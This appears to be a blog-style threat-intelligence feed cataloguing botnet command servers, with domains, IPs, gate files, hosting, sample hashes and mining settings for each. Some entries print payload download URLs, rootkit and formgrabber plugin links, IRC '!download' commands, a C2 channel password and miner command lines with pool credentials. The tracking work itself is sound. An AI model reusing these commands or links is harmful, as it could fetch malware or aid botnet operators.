Resolved illuminati.sx to 109.236.80.74 Server: illuminati.sx Gate file: /http/gate.php This is the first time I have seen the HTTP version of plasma and it sucks hard. It seems to be a slightly upgraded version of the old barracuda HTTP bot, with few of the problems fixed. Hosting info: http://whois.domaintools.com/109.236.80.74 Bitcoin mining info: miner.start http://109.236.80.74/miner/CPUMiner.files *-aRead more...
meziamussucemaqueue.su (Betabot http botnet hosted by sunnyvision.com)
Resolved meziamussucemaqueue.su to 124.248.205.104 Server: meziamussucemaqueue.su Gate file: /phpmiadmin/order.php Alternate domain: umbxd15896.su Bitcoin mining info: -o http://ypool.net:8080 -u Teolous.PTS_1 -p x Hosting info: http://whois.domaintools.com/124.248.205.104 Related md5s (Download sample from malwr.com) betabot: 670fa0a15754e1d67810eea73e890dad Bitcoin miner: e1aed5a5d729d37efca73602d8bc66e9 Bitcoin miner 2: a92403926113dd4b3a4d3e4c48eace66 EDIT: new mining info stratum+tcp://pool.d2.cc:3335 -u Hanito.bot -p 3fcua4
www.paloshke.org (Solar http botnet hosted by ghandi.net)
Resolved www.paloshke.org to 46.226.108.231 Server: www.paloshke.org Gate file: /index.php Alternate domains: www.bkcn.suwww.cahlr.comwww.rahmea.orgwww.businet.suwww.oscdfg.orgwww.monero.orgwww.webres.suwww.uwtriv.comwww.zmvnue.orgwww.oreape.comwww.xnighs.suwww.dvmnib.comwww.itmcff.orgwww.akwrzv.comwww.ivmqzc.orgwww.duvema.comwww.mtwogp.orgwww.hielah.comwww.apdekt.org Bitcoin mining infos: -a scrypt -s 20 –no-longpoll -q -o www2.oskefi.org:443 -u anonymous.1 -p -x Hosting infos: http://whois.domaintools.com/46.226.108.231 Related md5s Solar: eafe8ed59f752d7ae8240f3cdbc698f6
sentryme.com (Betabot http botnet hosted by ecatel.net)
Resolved sentryme.com to 94.102.51.123 Server: Sentryme.com Gate file: /order.php Altnerate domain: stayattentive.com Bitcoin mining info: -a sha256 -o stratum+tcp://162.243.6.88:3333 -u Ghettoweed.R -p x -g no -t 4 -a sha256 -o stratum+tcp://162.243.6.88:3333 -u Ghettoweed.R -p x -t 0 -I 10 The username string in the binary is the sky daddy_v1$, which corresponds to this Hackforums account.Read more...
adobe-helper.cloudapp.net (Andromeda http botnet hosted by microsoft.com)
Resolved adobe-helper.cloudapp.net to 168.63.166.85 Server: adobe-helper.cloudapp.net Gate file: /updates/gate.php It downloads a bitcoin miner and begins mining using this proxy, also hosted on the windows cloud: hxxp://updating-flash6.cloudapp.net Bonus andromeda 2.7 panel here: hxxp://adobe-helper.cloudapp.net/panel.zip Hosting infos: http://whois.domaintools.com/168.63.166.85 Related md5s (Search on Malwr.com to download samples) Andromeda: 2fd21454a5c17fcfffef9f900dec1434
ns1.androha.com (Andromeda http botnet hosted by namecheap.com)
Resolved ns1.androha.com to 162.213.250.141 Server: ns1.androha.com Gate file: /cgi/image.php Plugins: Rootkit: hxxp://ns1.androha.com/cgi/r.pack Socks: hxxp://ns1.androha.com/cgi/s.pack Formgrabber: hxxp://ns1.androha.com/cgi/f.pack Gate file: /cgi/fg.php First cracked andromeda I’ve seen in a while. Hosting infos: http://whois.domaintools.com/162.213.250.141 Related md5s (Search on malwr.com to download the sample) Andromeda: c5598dd742b5504084779ccfda0b207c
thebankslife.no-ip.biz (Athena irc botnet hosted by shellxnet.com)
Resolved thebankslife.no-ip.biz to 72.20.28.232 Server: thebankslife.no-ip.biz Port: 6667 Channel Users Topic #sexlyfe 2 [+nt] #Syncrude 78 [+sntVCT] !download hxxp://nassau03.nl/russiabm.exe 5 #bankslife 35 [+nt] .gtfo Channel: #Syncrude Now talking on #Syncrude Topic for #Syncrude is: !download hxxp://nassau03.nl/russiabm.exe 5 Topic for #Syncrude set by test (Fri Aug 09 00:17:01 2013) Bitcoin mining info: macromedia.exe” -a scrypt -oRead more...
bitcoinglobalbanking.com (Betabot http botnet hosted by leaseweb.com)
Resolved bitcoinglobalbanking.com to 82.192.92.5 Server: bitcoinglobalbanking.com Gate file: /b/order.php Alternate domain: bitcointradingdepot.com This botnet wasn’t actually mining bitcoins when I checked it. I’m very surprised. Hosting infos: http://whois.domaintools.com/82.192.92.5 Related md5s (search on malwr.com to download the samples): Beta bot bbfdbd53810751401b720641687a6116 EDIT: It finally started bitcoin mining Mining infos: macromedia.exe” -a scrypt -o http://mine.pool-x.eu:8080 -u jc2244.crRead more...
y.osej36.com (Irc botnet hosted by gandi.net)
Resolved y.osej36.com to 92.243.8.222 Server: y.osej36.com Port: 80 Server password: passwd Channel: #root Channel password: redem !NAZEL hxxp://www12.0zz0.com/2013/06/21/20/723860853.png a392564eae140562e4b27d0ab078ba1e !NAZEL hxxp://upload.tehran98.com/img1/9kxogpyfckk2xwuzzn6j.png a392564eae140562e4b27d0ab078ba1e !s -n A modified ircd is used, so you may have trouble connecting. Alternate domains: y.v23sdy.com y.rwt234.com Bitcoin mining info: minerd.exe -a scrypt -s 20 –no-longpoll -q -o za.oisdj.com:443 -u anonymous.1 -p -xRead more...
s5.6d6f6e65797072696e746572.com (Betabot http botnet hosted by infiumhost.com)
Resolved s5.6d6f6e65797072696e746572.com to 188.190.127.160 Server: s5.6d6f6e65797072696e746572.com Gate file: /wp-admin/order.php Alternate domains: ripraktec147.com youdbeproud228.com wyomiriding928.com Mining info: svchost.exe’ -I 100 -T 200 -t 2 -o stratum+tcp://s2.6d6f6e65797072696e746572.com:3333 -u mp187.her -p lex Hosting infos: http://whois.domaintools.com/188.190.127.160 Related md5s (search on malwr.com to download the samples): Betabot: db9a816d58899f1ba92bc338e89f856a